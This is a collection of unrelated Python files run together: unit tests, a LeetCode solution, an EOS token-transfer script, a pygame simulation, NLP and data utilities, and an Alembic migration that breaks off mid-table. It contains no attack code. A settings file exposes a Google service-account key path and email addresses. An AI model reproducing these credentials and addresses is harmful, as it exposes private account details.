    def test_empty(self):
        """Make a new empty sandbox (ignoring the default)
        """
        sb2 = TestSandbox()
        sb2_dir = sb2.sandbox
        self.assertEqual(sb2.lsdir('.'), [])
        # A trailing slash means "make a directory".
        new_dir = sb2.make('foo777/')
        self.assertEqual(new_dir, sb2_dir + '/foo777/')
        self.assertTrue(os.path.isdir(new_dir))
        sb2.cleanup()
        self.assertFalse(os.path.isdir(sb2_dir))

    def test_touch_link(self):
        """If I touch the link it should touch the link not the file.
        """
        unixtime = time.time()
        sb_dir = self.sb.sandbox + '/'
        # lstat (not stat) so we read the link's own mtime, not the target's.
        self.assertTrue( os.path.islink(sb_dir + 'alink1') )
        self.assertTrue( os.lstat(sb_dir + 'foo1').st_mtime < unixtime )
        self.assertTrue( os.lstat(sb_dir + 'foo2').st_mtime < unixtime )
        self.assertTrue( os.lstat(sb_dir + 'alink1').st_mtime < unixtime )
        # Touch it!
        self.sb.touch('alink1')
        self.assertTrue( os.lstat(sb_dir + 'foo1').st_mtime < unixtime )
        self.assertTrue( os.lstat(sb_dir + 'foo2').st_mtime < unixtime )
        self.assertFalse( os.lstat(sb_dir + 'alink1').st_mtime < unixtime )

    def test_touch_link2(self):
        """Recursive touch should affect links too.
        """
        sb_dir = self.sb.sandbox + '/'
        # Make everything 20 hours old then set the time on foo2 as a comparison
        self.sb.touch('.', recursive=True, hours_age=20)
        self.sb.touch('foo2', hours_age=10)
        self.assertTrue( os.lstat(sb_dir + 'foo1').st_mtime < os.lstat(sb_dir + 'foo2').st_mtime )
        self.assertTrue( os.lstat(sb_dir + 'alink1').st_mtime < os.lstat(sb_dir + 'foo2').st_mtime )

    def test_touch_timestamp(self):
        """I can now specify a timestamp for touching files
        If the timestamp and hours_age are both specified, then the hours should
        be subtracted from the timestamp.
        """
        # 946771200 == 2000-01-02T00:00:00 UTC.
        # NOTE(review): datetime.utcfromtimestamp is deprecated since 3.12;
        # datetime.fromtimestamp(ts, tz=timezone.utc) is the replacement.
        self.sb.touch('foo1', timestamp=946771200)
        self.sb.touch('foo2', timestamp=946771200, hours_age=24)
        sb_dir = self.sb.sandbox + '/'
        self.assertEqual( datetime.utcfromtimestamp(os.stat(sb_dir + 'foo1').st_mtime),
                          datetime(year=2000, month=1, day=2) )
        self.assertEqual( datetime.utcfromtimestamp(os.stat(sb_dir + 'foo2').st_mtime),
                          datetime(year=2000, month=1, day=1) )

    def test_make_touch(self):
        """Do some stuff in the default sandbox
        """
        res1 = self.sb.make('d1/d2/d3/afile', hours_age=1)
        res2 = self.sb.make('da/db/dc/')
        sb_dir = self.sb.sandbox + '/'
        self.assertEqual(res1, sb_dir + 'd1/d2/d3/afile')
        self.assertTrue(os.path.isfile(res1))
        self.assertEqual(res2, sb_dir + 'da/db/dc/')
        self.assertTrue(os.path.isdir(res2))
        # Get the current system time
        unixtime = time.time()
        self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
        # Non-recursive touch only updates the named directory itself.
        self.sb.touch('d1/d2')
        self.assertTrue( os.stat(sb_dir + 'd1').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2').st_mtime < unixtime )
        self.assertTrue( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
        self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
        # Recursive touch updates everything below (but not the parent).
        self.sb.touch('d1/d2', recursive=True)
        self.assertTrue( os.stat(sb_dir + 'd1').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
        # Ageing one file must not bump its parent directory.
        self.sb.touch('d1/d2/d3/afile', hours_age=3)
        self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
        self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
        self.sb.touch('.', recursive=True)
        self.assertFalse( os.stat(sb_dir + 'd1').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
        # make() with hours_age ages the new file but not its directory.
        self.sb.make('d1/d2/d3/bfile', hours_age=1)
        self.assertFalse( os.stat(sb_dir + 'd1/d2/d3').st_mtime < unixtime )
        self.assertFalse( os.stat(sb_dir + 'd1/d2/d3/afile').st_mtime < unixtime )
        self.assertTrue( os.stat(sb_dir + 'd1/d2/d3/bfile').st_mtime < unixtime )

    def test_links(self):
        """Make some links with the link() method
        """
        res1 = self.sb.link("foo2", "alink2")
        res2 = self.sb.link("foo2", "new/dir/alink2")
        # Links in subdirs should work, either because they are fixed relative or made
        # absolute. It doesn't really matter which.
        if VERBOSE:
            print(res2)
            print(os.readlink(res2))
            print(os.lstat(res2))
            print(os.stat(res2))
        self.assertTrue( os.path.islink(res1) )
        self.assertTrue( os.path.islink(res2) )
        # stat() follows the links: both must resolve to foo2 itself.
        self.assertEqual( os.stat(res1), os.stat(os.path.join(self.sb.sandbox, "foo2")) )
        self.assertEqual( os.stat(res2), os.stat(os.path.join(self.sb.sandbox, "foo2")) )

    def test_errors(self):
        """I can't make a file twice, or touch a file that doesn't exsist.
        """
        self.sb.make("la/la")
        self.assertRaises(FileExistsError, self.sb.make, "la")
        self.assertRaises(FileExistsError, self.sb.make, "la/la")
        # Ditto if I try to make a link
        self.assertRaises(FileExistsError, self.sb.link, "dummy_target", "la/la")
        # But making a directory that pre-exists is just a no-op
        self.assertEqual(self.sb.make("la/"), os.path.join(self.sb.sandbox, "la/"))
        # I can't touch a file that doesn't exist
        self.assertRaises(FileNotFoundError, self.sb.touch, 'notafile')
        self.assertRaises(FileNotFoundError, self.sb.touch, 'notadir', recursive=True)
        # I can't recursively touch a file
        self.assertRaises(NotADirectoryError, self.sb.touch, 'la/la', recursive=True)

    def test_remove_readonly(self):
        """Cleanup should work even if a file or directory is read-only
        """
        # For this we need a second sandbox since we need to explictly call cleanup
        sb2 = TestSandbox()
        tmp_dir = sb2.sandbox
        self.assertTrue(os.path.exists(tmp_dir))
        sb2.make("badperms_dir/badperms_file")
        # Strip all permission bits; cleanup must still remove the tree.
        os.chmod(os.path.join(sb2.sandbox, "badperms_dir/badperms_file"), 0)
        os.chmod(os.path.join(sb2.sandbox, "badperms_dir"), 0)
        sb2.cleanup()
        self.assertFalse(os.path.exists(tmp_dir))
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
import pytest
from src.controllers.base_controller import BaseController
from src.controllers.bet_controller import BetController
from src.models.bet import Bet
@pytest.fixture
def create_instance():
    """Provide a fresh BetController for each test."""
    return BetController()
def test_bet_controller_instance(create_instance):
    """The fixture object is a BetController and inherits BaseController."""
    controller = create_instance
    assert isinstance(controller, BaseController)
    assert isinstance(controller, BetController)
def test_read_all_should_return_list(create_instance):
    """read_all returns a list (possibly empty)."""
    assert isinstance(create_instance.read_all(), list)
def test_read_by_id_with_invalid_id_should_raise_exception(create_instance):
    """Looking up a nonexistent id raises with the expected message."""
    with pytest.raises(Exception) as exc_info:
        create_instance.read_by_id(71289379)
    assert str(exc_info.value) == 'Object not found in the database.'
|
# 496. Next Greater Element I
# Runtime: 44 ms, faster than 88.07% of Python3 online submissions for Next Greater Element I.
# Memory Usage: 14.5 MB, less than 43.69% of Python3 online submissions for Next Greater Element I.
class Solution:
    """LeetCode 496. Next Greater Element I — monotonic-stack solution."""

    def nextGreaterElement(self, nums1: list[int], nums2: list[int]) -> list[int]:
        """For each value of nums1, return the first strictly greater value
        to its right in nums2, or -1 if there is none.

        Single left-to-right pass over nums2 with a decreasing stack:
        O(len(nums1) + len(nums2)) time. Assumes nums2 values are distinct
        and nums1 is a subset of nums2 (the problem's guarantee).
        """
        next_greater: dict[int, int] = {}
        pending: list[int] = []
        for value in nums2:
            # Everything on the stack smaller than `value` has found its
            # next greater element.
            while pending and value > pending[-1]:
                next_greater[pending.pop()] = value
            pending.append(value)
        # Leftovers have no greater element to their right.
        for leftover in pending:
            next_greater[leftover] = -1
        return [next_greater[v] for v in nums1]
from ut import runcleos
import json
def _push_transaction(d):
    """Push a fully-assembled transaction dict to the chain via cleos."""
    command = [
        "cleos",
        "-u",
        "https://api.eosbeijing.one",
        "push",
        "transaction",
        json.dumps(d),
    ]
    return runcleos(command)
def getaction(contract, action, data, f, p=False):
    """Build one action's transaction JSON via ``cleos push action``.

    contract: the contract account to call
    action: the action (method) name to invoke
    data: the action's payload (JSON-serializable)
    f: the account that authorizes/signs the action
    p: unused -- TODO confirm whether it was meant to toggle printing

    Returns the parsed JSON dict produced by cleos. The -d/-s flags
    presumably make cleos emit the transaction without broadcasting it, so
    the result can be merged by push_transaction() -- confirm against the
    cleos documentation.
    """
    cmd = [
        "cleos",
        "-u",
        "https://api.eosbeijing.one",
        "push",
        "action",
        contract,
        action,
        json.dumps(data),
        "-d",
        "-s",
        "-p",
        f,
    ]
    return json.loads(runcleos(cmd))
def push_transaction(actions):
    """Merge several dry-run actions into one transaction and push it.

    Each entry of *actions* is [contract, action, data, signer] -- exactly the
    positional arguments of getaction(). The "actions" lists of all dry-run
    results are folded into the first result, which is then pushed as a
    single transaction.

    Raises ValueError on an empty list (the original code crashed with a
    NameError here because `ret` was never bound).
    """
    if not actions:
        raise ValueError("push_transaction() needs at least one action")
    # Seed with the first dry-run result, then append everyone else's actions.
    ret = getaction(*actions[0])
    for spec in actions[1:]:
        ret["actions"].extend(getaction(*spec)["actions"])
    return _push_transaction(ret)
if __name__ == "__main__":
    # Demo: bundle three identical token transfers into a single transaction.
    transfer = ["eosbocaira12", "redredredred", "1.0000 EOS", "save"]
    actions = [
        ["eosio.token", "transfer", list(transfer), "eosbocaira12"]
        for _ in range(3)
    ]
    print(push_transaction(actions))
|
from libs import pygame_textinput
import pygame
import time
from random import randrange
from objects.foca import Foca
from objects.alga import Alga
from objects.tubarao import Tubarao
from objects.peixe import Peixe
import random
from objects.tela import Tela
from objects.utils import utils
pygame.init()
pygame.display.set_caption('Ecossistema Aquático')
# Clock used to cap the frame rate of the input screens and the simulation.
clock = pygame.time.Clock()
# Thread objects for every creature placed on the board.
seres_objetos = []
# How many of each species to spawn (one slot per entry of utils.seres).
inputs = [0 for i in range(len(utils.seres))]
# One text-input widget per species, plus widgets for the global parameters.
textinputs = [pygame_textinput.TextInput("","",35,True,(255,255,0)) for i in range(len(inputs))]
calorias_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
calorias_perde_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
tempo_perder_calorias_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
tamanho_mapa_quadrados_input = pygame_textinput.TextInput("","",35,True,(255,255,0))
screen = pygame.display.set_mode((utils.w, utils.h))
# Interactive prompts (Portuguese UI strings): calories per animal, calories
# gained/lost per event, seconds between calorie losses, and board size.
calorias = utils.single_input_int_com_mensagem(screen,clock,calorias_input, 'Digite quantas calorias você quer por animal na simulação:')
calorias_perde = utils.single_input_int_com_mensagem(screen,clock,calorias_perde_input, 'Digite quantas calorias animal perde/ganha:')
tempo_perder_calorias = utils.single_input_int_com_mensagem(screen,clock,tempo_perder_calorias_input, 'De quantos em quantos segundos perde caloria:')
tamanho_matriz = utils.single_input_int_com_mensagem(screen,clock,tamanho_mapa_quadrados_input, 'Quadrados por linha (tamanho col == linha):')
utils.inicializa_mundo(tamanho_matriz)
# Ask how many individuals of each species to create.
for i,textinput in enumerate(textinputs):
    inputs[i] = utils.single_input_int_com_mensagem(screen,clock,textinput, 'Número de %s para a execução da simulação:'%(utils.seres_plural[i]))
# Load and scale one sprite per species.
alga = utils.carrega_sprite('alga_32_32-1.png')
tubarao = utils.carrega_sprite('tubarao_32_32.png')
foca = utils.carrega_sprite('foca_32_32.png')
peixe = utils.carrega_sprite('peixe_32_32.png')
alga = pygame.transform.scale(alga,(utils.tamanho_sprite,utils.tamanho_sprite))
tubarao = pygame.transform.scale(tubarao,(utils.tamanho_sprite,utils.tamanho_sprite))
peixe = pygame.transform.scale(peixe,(utils.tamanho_sprite,utils.tamanho_sprite))
foca = pygame.transform.scale(foca,(utils.tamanho_sprite,utils.tamanho_sprite))
# Abort when more creatures were requested than there are board cells.
total_seres = 0
for quantidade_seres in inputs:
    for j in range(quantidade_seres):
        total_seres+=1
if(total_seres > (utils.tamanho_matriz*utils.tamanho_matriz)):
    print("-- Tamanho de seres excede o tamanho do tabuleiro! --")
    exit()
utils.inicializa_semaforos(total_seres)
ids=0
finalizou = False
# Instantiate every creature at a random free position; `ids` doubles as the
# creature's semaphore index.
for chave,quantidade_seres in enumerate(inputs):
    print("Qtd animais " + str(quantidade_seres))
    for j in range(quantidade_seres):
        # (x, y) = utils.coloca_em_posicao_aleatoria(ids,utils.seres[chave])
        (x, y) = utils.coloca_em_posicao_aleatoria(None)
        if(utils.seres[chave] == 'alga'):
            novo_ser = Alga(ids,alga,alga.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y)
        elif(utils.seres[chave] == 'peixe'):
            novo_ser = Peixe(ids,peixe,peixe.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y,calorias,calorias_perde)
        elif(utils.seres[chave] == 'tubarao'):
            novo_ser = Tubarao(ids,tubarao,tubarao.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y,calorias,calorias_perde)
        elif(utils.seres[chave] == 'foca'):
            novo_ser = Foca(ids,foca,foca.get_rect(),utils.tamanho_sprite,utils.tamanho_sprite,x,y,calorias,calorias_perde)
        utils.coloca_em_posicao_especifica(novo_ser)
        seres_objetos.append(novo_ser)
        # Increment the id so the screen thread gets the last semaphore slot.
        ids+=1
start_time = pygame.time.get_ticks()
tela = Tela(ids, screen, start_time,tempo_perder_calorias)
# Start every creature thread plus the screen thread.
for ser in seres_objetos:
    ser.start()
tela.start()
# Wait for all threads to finish before exiting.
for ser in seres_objetos:
    ser.join()
tela.join()
# quit()
# -*- coding: utf-8 -*-
'''
* Copyright (C) 2015 Music Technology Group - Universitat Pompeu Fabra
*
* This file is part of pypYIN
*
* pypYIN is free software: you can redistribute it and/or modify it under
* the terms of the GNU Affero General Public License as published by the Free
* Software Foundation (FSF), either version 3 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the Affero GNU General Public License
* version 3 along with this program. If not, see http://www.gnu.org/licenses/
*
* If you have any problem about this python version code, please contact: Rong Gong
* rong.gong@upf.edu
*
* If you have any problem about this algorithm, I suggest you to contact: Matthias Mauch
* m.mauch@qmul.ac.uk who is the original C++ version author of this algorithm
*
* If you want to refer this code, please consider this article:
*
* M. Mauch and S. Dixon,
* “pYIN: A Fundamental Frequency Estimator Using Probabilistic Threshold Distributions”,
* in Proceedings of the IEEE International Conference on Acoustics,
* Speech, and Signal Processing (ICASSP 2014), 2014.
*
* M. Mauch, C. Cannam, R. Bittner, G. Fazekas, J. Salamon, J. Dai, J. Bello and S. Dixon,
* “Computer-aided Melody Note Transcription Using the Tony Software: Accuracy and Efficiency”,
* in Proceedings of the First International Conference on Technologies for
* Music Notation and Representation, 2015.
'''
from scipy.stats import norm
import numpy as np
import matplotlib.pyplot as plt

sigma2Note = 0.7  # note transition probability standard deviation used in pYin
noteDistanceDistr = norm(loc=0, scale=sigma2Note)

fig, ax = plt.subplots(1, 1)
# Bug fix: the plot previously used the *standard* normal (scale=1) even
# though noteDistanceDistr (scale=sigma2Note) was constructed for exactly
# this figure -- so the plotted curve did not match the pYIN parameter.
x = np.linspace(noteDistanceDistr.ppf(0.01), noteDistanceDistr.ppf(0.99), 100)
ax.plot(x, noteDistanceDistr.pdf(x), 'r-', lw=5, alpha=0.6, label='norm pdf')
ax.legend(loc='best', frameon=False)
plt.title('note transition probability function')
plt.xlabel('note transition distance in semitone')
plt.show()
|
import altair as alt
import pandas as pd
from .visitor import visit
from .aggregate import AGG_REPLACEMENTS
@visit.register(alt.JoinAggregateTransform)
def visit_joinaggregate(
    transform: alt.JoinAggregateTransform, df: pd.DataFrame
) -> pd.DataFrame:
    """Apply a Vega-Lite joinaggregate transform to *df*.

    Each aggregate is computed (optionally per group) and joined back onto
    every row, so the frame keeps its original length.
    """
    spec = transform.to_dict()
    groupby = spec.get("groupby")
    for agg in spec["joinaggregate"]:
        out_col = agg["as"]
        op = AGG_REPLACEMENTS.get(agg["op"], agg["op"])
        field = agg["field"]
        # "*" means "any field": fall back to the first column unless a
        # literal "*" column actually exists.
        if field == "*" and field not in df.columns:
            field = df.columns[0]
        if groupby is None:
            df[out_col] = df[field].aggregate(op)
        else:
            grouped = df.groupby(groupby)[field].aggregate(op)
            grouped.name = out_col
            df = df.join(grouped, on=groupby)
    return df
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from xml.dom import minidom
import os
pathTransDir = '/Users/renyushuang/custom/projectDo/DuScreenRecorder/RecordMaster/src/main/res'
pathTransFile = 'strings.xml'
pathAndroidDir = '/Users/renyushuang/custom/projectDo/VideoDownloader/app/src/main/res'
pathAndroidFile = 'strings.xml'
targetList = ['durec_recorder_noti_start',
'durec_setting_show_touches']
def writeXmlNewString(pathAndroiid, list):
    """Rewrite the strings.xml at *pathAndroiid*, appending the entries of *list*.

    Existing <string> elements are copied over verbatim, then every
    (name, text) pair from *list* (a dict; the parameter name shadows the
    builtin but is kept for backward compatibility) is appended, and the
    file is rewritten in place.
    """
    doc = minidom.Document()
    root = minidom.parse(pathAndroiid)
    docRoot = doc.createElement('resources')
    docRoot.setAttribute('xmlns:tools', 'http://schemas.android.com/tools')
    docRoot.setAttribute('xmlns:xliff', 'urn:oasis:names:tc:xliff:document:1.2')
    doc.appendChild(docRoot)
    # Copy the existing <string> entries over unchanged.
    for ele in root.getElementsByTagName('string'):
        element = doc.createElement('string')
        element.setAttribute("name", ele.attributes['name'].value)
        element.appendChild(doc.createTextNode(ele.firstChild.data))
        doc.documentElement.appendChild(element)
    # Append the newly translated entries.
    for k, v in list.items():
        element = doc.createElement('string')
        element.setAttribute("name", k)
        element.appendChild(doc.createTextNode(v))
        doc.documentElement.appendChild(element)
    # Bug fix: the output handle was never closed; use a context manager so
    # the file is flushed and closed deterministically before callers reread it.
    with open(pathAndroiid, 'w') as fp:
        doc.writexml(fp, indent='', addindent='\t', newl='\n')
def getTransMap(path):
    """Collect {name: text} for every <string> whose name is in targetList."""
    wanted = set(targetList)
    translations = {}
    for ele in minidom.parse(path).getElementsByTagName('string'):
        name = ele.attributes['name'].value
        if name in wanted:
            translations[name] = ele.firstChild.data
    return translations
def main():
    """Copy the target strings from each translated res dir into the app's res dir."""
    for res_dir in os.listdir(pathTransDir):
        source_file = os.path.join(pathTransDir, res_dir, pathTransFile)
        # Skip locales that ship no strings.xml at all.
        if not os.path.exists(source_file):
            continue
        transMap = getTransMap(source_file)
        # Skip locales the target app does not have a res dir for.
        # NOTE: creating the missing dir (os.mkdir) was intentionally disabled.
        if not os.path.exists(os.path.join(pathAndroidDir, res_dir)):
            continue
        if len(transMap) != 0:
            dest_file = os.path.join(pathAndroidDir, res_dir, pathAndroidFile)
            print(dest_file)
            if not os.path.exists(dest_file):
                continue
            writeXmlNewString(dest_file, transMap)
        else:
            print('没有匹配的字段')
# Guard the entry point so importing this module no longer rewrites files.
if __name__ == '__main__':
    main()
|
from typing import List, Tuple
import numpy as np
import pandas as pd
import sklearn
from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import StandardScaler
class IsolationForestDetector(object):
    """Outlier detector: standard-scales features, then applies an IsolationForest."""

    def __init__(self):
        # Standardizes features before they reach the forest.
        self._scaler = StandardScaler()
        # contamination=0.1: the forest assumes ~10% of the data is anomalous.
        self._forest = IsolationForest(contamination=0.1)

    @property
    def scaler(self):
        """The StandardScaler instance (exposed for inspection/reuse)."""
        return self._scaler

    def fit(self, X: np.ndarray):
        """Fit both the scaler and the forest on the raw feature matrix X."""
        self._forest.fit(self._scaler.fit_transform(X))

    def predict(self, X: np.array):
        """Return IsolationForest labels for X (scaled with the fitted scaler)."""
        return self._forest.predict(self._scaler.transform(X))

    def score(self, X: np.array):
        """Return anomaly scores for X; larger values mean more anomalous."""
        return -self._forest.decision_function(self._scaler.transform(X))
|
from collections import defaultdict
from itertools import groupby
import sys
from q40 import Morph, arg_int
class Chunk:
    """One bunsetsu (phrase chunk) parsed from CaboCha lattice-format output."""
    __slots__ = ('idx', 'dst', 'morphs', 'srcs')

    # Header lines look like: * 0 2D 0/0 -0.764522
    def __init__(self, line):
        fields = line.rstrip().split()
        self.idx = int(fields[1])              # this chunk's index
        self.dst = int(fields[2].rstrip("D"))  # head chunk index (-1 = root)
        self.morphs = []
        self.srcs = []

    def __str__(self):
        return ''.join(morph.surface for morph in self.morphs)

    def __repr__(self):
        return 'q41.Chunk({}, {})'.format(self.idx, self.dst)

    def srcs_append(self, src_idx):
        """Record the index of a chunk that depends on this one."""
        self.srcs.append(src_idx)

    def morphs_append(self, line):
        """Parse one morpheme line and append it to this chunk."""
        self.morphs.append(Morph(line))

    def chunk2str(self):
        """Surface form of the chunk with symbol (記号) morphemes removed."""
        return ''.join(morph.surface for morph in self.morphs if morph.pos != '記号')

    def contain_pos(self, pos):
        """Return whether any morpheme in this chunk has part-of-speech *pos*."""
        return any(morph.pos == pos for morph in self.morphs)
class Sentence:
    """Reads one sentence from a CaboCha lattice-format file; helper around Chunk."""
    __slots__ = ('chunks', 'idx')
    def __init__(self, sent_lines):
        self.chunks = []
        ch_append = self.chunks.append
        for line in sent_lines:
            if line.startswith('* '):
                ch_append(Chunk(line))
            else:
                self.chunks[-1].morphs_append(line)
        # Second pass exists purely to populate each chunk's srcs
        # (reverse-dependency) list.
        for chunk in self.chunks:
            if chunk.dst != -1:
                self.chunks[chunk.dst].srcs_append(chunk.idx)
    def __str__(self):
        return ' '.join([morph.surface for chunk in self.chunks for morph in chunk.morphs])
    @classmethod
    def load_cabocha(cls, fi):
        """Yield Sentence instances from a CaboCha lattice-format stream (split on EOS lines)."""
        for is_eos, sentence in groupby(fi, key=lambda x: x == 'EOS\n'):
            if not is_eos:
                yield cls(sentence)
    def print_dep_idx(self):
        """Print each chunk's index/surface and the index of the chunk it depends on."""
        for chunk in self.chunks:
            print('{}:{} => {}'.format(chunk.idx, chunk, chunk.dst))
    def print_dep(self):
        """Print dependent and head chunk surfaces, tab-separated."""
        for chunk in self.chunks:
            if chunk.dst != -1:
                print('{}\t{}'.format(chunk.chunk2str(), self.chunks[chunk.dst].chunk2str()))
    def dep_edge(self):
        """Return (dependent, head) surface pairs, for pydot rendering."""
        return [(chunk.chunk2str(), self.chunks[chunk.dst].chunk2str())
                for chunk in self.chunks if chunk.dst != -1]
    def print_noun_verb_dep(self):
        """Print dependencies where a noun chunk depends on a verb chunk."""
        for chunk in self.chunks:
            if chunk.contain_pos('名詞') and self.chunks[chunk.dst].contain_pos('動詞'):
                print('{}\t{}'.format(chunk.chunk2str(), self.chunks[chunk.dst].chunk2str()))
    def trace_dep_path(self):
        """Yield the dependency path from each noun chunk up to the root.

        NOTE(review): the SAME list object is yielded every time and cleared
        right after -- callers must copy it before advancing the generator.
        """
        path = []
        ph_append = path.append
        for chunk in self.chunks:
            if chunk.contain_pos('名詞'):
                ph_append(chunk)
                d = chunk.dst
                while d != -1:
                    ph_append(self.chunks[d])
                    d = self.chunks[d].dst
                yield path
                path.clear()
def main():
    """Print dependency indices of the N-th sentence on stdin (N from argv)."""
    target = arg_int()
    for number, sentence in enumerate(Sentence.load_cabocha(sys.stdin), start=1):
        if number == target:
            sentence.print_dep_idx()
            break


if __name__ == '__main__':
    main()
import babelfish
# Local directory settings.
TV_PATH = '/home/siorai/Downloads/Transmission/Organized/TV'
MOVIE_PATH = '/home/siorai/Downloads/Transmission/Organized/Movies'
APP_PATH = '/home/siorai/Downloads/Transmission/Organized/Programs'
MUSIC_PATH = '/home/siorai/Downloads/Transmission/Organized/Music'
OTHER_PATH = '/home/siorai/Downloads/Transmission/Organized/Other'
DEFAULT_PATH = '/home/siorai/Downloads/Transmission/Organized/'
# Log settings.
LOGFILE = 'pyexp.log'
# Extraction settings.
# chmod-style permission string for extracted files -- presumably octal; verify against consumer.
EXTRACTION_FILES_MASK = '770'
EXTRACTION_TEMP_DIR_NAME = '_extracted'
EXTRACTION_EXECUTABLE = '7z'
# Subtitle settings.
SHOULD_FIND_SUBTITLES = True
# A map between each language and its favorite subliminal providers (None for all providers).
LANGUAGES_MAP = {
    babelfish.Language('heb'): ['subscenter'],
    babelfish.Language('eng'): []
}
# Upload settings.
SHOULD_UPLOAD = False
UPLOAD_TO = 'Google'
ACD_CLI_PATH = '/usr/bin/acd_cli'
DEFAULT_VIDEO_EXTENSION = '.mkv'
SUBTITLES_EXTENSIONS = ['.srt']
# Language suffixes placed before the subtitle extension (e.g. name.he.srt) -- TODO confirm.
LANGUAGE_EXTENSIONS = ['.he', '.en']
# Lists.
EXTENSIONS_WHITE_LIST = ['.srt', '.mkv', '.avi', '.mp4', '.mov', '.m4v', '.wmv']
NAMES_BLACK_LIST = ['sample']
# Remote settings.
# Amazon directory settings.
AMAZON_TV_PATH = '/amazon/tv/path'
AMAZON_MOVIE_PATH = '/amazon/movies/path'
ORIGINAL_NAMES_LOG = '/var/log/original_names.log'
# Google Drive settings.
# NOTE(review): service-account credentials -- keep this file out of version control.
KEYFILE = '/home/siorai/Python/GoogleDriveFtw!-fc20e0f60d1b.json'
CLIENT_EMAIL = 'seedbox@virtual-plexus-92702.iam.gserviceaccount.com'
DELEGATED_EMAIL = 'paul@ladancesafe.org'
|
"""empty message
Revision ID: 06e2c7d46e81
Revises:
Create Date: 2021-08-29 11:52:21.775818
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '06e2c7d46e81'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Tables are created parents-first so every foreign key has a target:
    # category/tag/user first, then the tables that reference them.
    op.create_table('category',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('category_name', sa.String(length=255), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('tag',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('tag_name', sa.String(length=255), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('user',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('username', sa.String(length=255), nullable=False),
    sa.Column('email', sa.String(length=255), nullable=False),
    sa.Column('password', sa.String(length=60), nullable=False),
    sa.Column('is_admin', sa.Boolean(), nullable=True),
    sa.Column('timestamp', sa.DateTime(), nullable=False),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email'),
    sa.UniqueConstraint('username')
    )
    # Self-referential many-to-many on user (who follows whom).
    op.create_table('followers',
    sa.Column('follower_id', sa.Integer(), nullable=True),
    sa.Column('followed_id', sa.Integer(), nullable=True),
    sa.Column('timestamp', sa.DateTime(), nullable=False),
    sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),
    sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )
    )
    op.create_table('post',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('title', sa.String(length=255), nullable=False),
    sa.Column('content', sa.Text(), nullable=False),
    sa.Column('timestamp', sa.DateTime(), nullable=False),
    sa.Column('good_count', sa.Integer(), nullable=False),
    sa.Column('category_id', sa.Integer(), nullable=False),
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('profile',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('image_data', sa.String(length=20), nullable=False),
    sa.Column('content', sa.String(length=255), nullable=False),
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('comment',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('content', sa.String(length=255), nullable=False),
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('post_id', sa.Integer(), nullable=False),
    sa.Column('timestamp', sa.DateTime(), nullable=False),
    sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('post_child',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('title', sa.String(length=255), nullable=False),
    sa.Column('description', sa.Text(), nullable=False),
    sa.Column('image_data', sa.String(length=20), nullable=False),
    sa.Column('num', sa.Integer(), nullable=False),
    sa.Column('post_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # Association tables (no surrogate primary key).
    op.create_table('post_goods',
    sa.Column('post_id', sa.Integer(), nullable=True),
    sa.Column('user_id', sa.Integer(), nullable=True),
    sa.Column('timestamp', sa.DateTime(), nullable=False),
    sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], )
    )
    op.create_table('post_tags',
    sa.Column('post_id', sa.Integer(), nullable=True),
